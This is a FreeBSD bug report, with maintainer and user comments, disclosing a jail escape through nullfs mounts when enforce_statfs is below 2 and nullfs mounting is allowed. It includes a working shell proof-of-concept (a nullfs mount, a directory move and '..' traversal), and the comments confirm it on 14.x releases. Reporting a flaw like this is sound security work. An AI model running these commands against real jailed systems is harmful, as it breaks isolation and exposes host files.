Bug 262180

Summary: jail escaping via jail-friendly nullfs
Product: Base System Reporter: firk
Component: kernAssignee: freebsd-bugs (Nobody) <bugs>
Status: Open ---    
Severity: Affects Only Me CC: chris, crest, dch, emaste, grahamperrin, monwarez, pat, tom
Priority: --- Keywords: needs-qa, security
Version: 12.3-RELEASE   
Hardware: Any   
OS: Any   

Description firk 2022-02-24 23:43:32 UTC 
Jail could be escaped when run with enforce_statfs<2, allow.mount=true, allow.mount.nullfs=true.

prepare jail environment
> mkdir /j/1
> tar -c -f - /bin/ lib /libexec /sbin | tar -x -f - -C /j/1
> mkdir /j/1/tmp

start a vulnerable jail
> jail -c path=/j/1 persist=false allow.mount=true allow.mount.nullfs=true enforce_statfs=1 command=/bin/sh

malicious code
> mkdir /tmp/a /tmp/a/b/c /tmp/a/b/c/test /tmp/a/d
> mount -t nullfs /tmp/a/b/c /tmp/a/d
> cd /tmp/a/d/test
> mv /tmp/a/b/c/test /tmp/a/b/test
> ls -al ../../../../..
> ls -al ../../../../../..

you will see the files outside the jail
Comment 1 Graham Perrin freebsd_committer freebsd_triage 2023-06-21 23:33:04 UTC 
> 12.3-RELEASE

No longer supported. 

Can you reproduce symptoms with a supported RELEASE? 

<https://www.freebsd.org/security/#sup>

Thank you.
Comment 2 crest 2023-07-25 09:27:19 UTC 
Where in your sequence of of commands did you attach to the jail? It's the jail that's locking in processes not the nullfs. Outside of the jail you're expected to be able to leave the nullfs with `cd ..`. Or did I miss-understand and the nullfs mount from inside the jail is able to expose a path from beneath the jail under the jail root directory despite the (n)mount performed inside the jail? If this is the case just ignoring it with a the release is EoL is a cheap cop out and we have to define what's the expected semantics for nullfs mounting at different enforce_statfs levels.
Comment 3 firk 2023-11-24 22:44:59 UTC 
(In reply to Graham Perrin from comment #1)

> Can you reproduce symptoms with a supported RELEASE? 

Yes it still works on 14.0-RELEASE.
Comment 4 firk 2023-11-24 22:46:03 UTC 
(In reply to crest from comment #2)

> Where in your sequence of of commands did you attach to the jail?

"jail" command does this (create+attach).
Comment 5 Thibault Payet 2024-07-12 18:11:24 UTC 
This can be reproduced on 14.2 as well. (note the need to pass -p for mkdir).
Comment 6 Thibault Payet 2024-07-13 12:02:52 UTC 
(In reply to Thibault Payet from comment #5)
Note that this does not work on ZFS if each jail are in separate datasets. See the result when using a dataset for /j

zfs create zroot/j
zfs set mountpoint=/j zroot/j
mkdir /j/1
mkdir -p /tmp/a /tmp/a/b/c /tmp/a/b/c/test /tmp/a/d
mount -t nullfs /tmp/a/b/c /tmp/a/d
cd /tmp/a/d/test/
mv /tmp/a/b/c/test /tmp/a/b/test

ls -al ../../../../..
Return

ls: ..: No such file or directory
total 2
drwxr-xr-x  3 0 0 3 Jul 13 11:54 .
drwxr-xr-x  7 0 0 7 Jul 13 11:54 1

And
ls -al ../../../../../..
Return
ls: ../../../../../..: No such file or directory